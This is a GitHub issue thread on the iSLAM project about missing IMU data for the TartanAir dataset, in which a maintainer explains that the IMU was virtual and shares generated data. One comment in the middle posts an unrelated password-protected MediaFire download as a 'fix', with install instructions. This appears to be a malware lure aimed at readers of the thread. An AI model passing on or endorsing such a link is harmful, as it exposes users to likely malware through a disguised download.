### ISSUE TITLE
Tartanair' has no IMU dataset

### ISSUE THREAD

**Issue by Vench1** [sair-lab/iSLAM#5]
This is a very novel and surprising work, thanks to the author.
I was training on tartanair and realized that tartanair does not have imu dataset, when I tried to modify [Datasets/TrajFolderDataset.py](https://github.com/sair-lab/iSLAM/blob/main/Datasets/TrajFolderDataset.py), and when changing has_imu to False, the train. py prompt:

`AttributeError: 'TrajFolderDataset' object has no attribute 'accels'`

So, in [Datasets/TrajFolderDataset.py](https://github.com/sair-lab/iSLAM/blob/main/Datasets/TrajFolderDataset.py) we need to load the imu dataset, however unfortunately I didn't find any imu related dataset in tartanair official website, could the author please mention the dataset?
```
imudir = datadir + '/imu'
# acceleration in the body frame
self.accels = np.load(imudir + '/acc_nograv_body.npy')
# angular rate in the body frame
self.gyros = np.load(imudir + '/gyro.npy')
# velocity in the world frame
self.vels = np.load(imudir + '/vel_global.npy')
```

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FuTaimeng** [comment]
Hi,

Thank you for your interest in our work. TartanAir used a virtual IMU. Its measurements are interpolated from the ground truth poses, and added some random noise. Unfortunately, they didn't publish it.

I can share the data that we generated in the same manner. You can find it here: https://buffalo.box.com/s/sjesyq6ogievmlv1rsydnjst83qhrscy

**Comment by Vench1** [comment]
Thanks again for your selfless sharing! It looks like the content in this link is not available now though :)

> Hi,
> 
> Thank you for your interest in our work. TartanAir used a virtual IMU. Its measurements are interpolated from the ground truth poses, and added some random noise. Unfortunately, they didn't publish it.
> 
> I can share the data that we generated in the same manner. You can find it here: https://buffalo.box.com/s/sjesyq6ogievmlv1rsydnjst83qhrscy

**Comment by FuTaimeng** [comment]
I updated the access settings. Could you please try again?

**Comment by Vench1** [comment]
Thanks, I can download the imu data now.
